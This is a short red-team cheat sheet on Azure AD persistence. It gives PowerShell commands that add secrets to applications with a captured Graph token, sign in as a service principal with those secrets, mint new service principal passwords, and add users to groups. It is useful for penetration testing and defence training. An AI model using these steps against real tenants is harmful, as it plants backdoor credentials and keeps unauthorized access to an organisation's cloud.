Azure AD - Persistence

Add Secrets to Application

• Add secrets with lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1

  PS > . C:\Tools\Add-AzADAppSecret.ps1
  PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
  

• Use secrets to authenticate as Service Principal

  PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
  PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
  PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
  

Add Service Principal

• Generate a new service principal password/secret

  Import-Module Microsoft.Graph.Applications
  Connect-MgGraph 
  $servicePrincipalId = "<service-principal-id>"
  
  $params = @{
      passwordCredential = @{
          displayName = "NewCreds"
      }
  }
  Add-MgServicePrincipalPassword -ServicePrincipalId $servicePrincipalId -BodyParameter $params
  

Add User to Group

Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose

References

• Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019
• Microsoft Graph - servicePrincipal: addPassword
• Training - Attacking and Defending Azure Lab - Altered Security

Share this content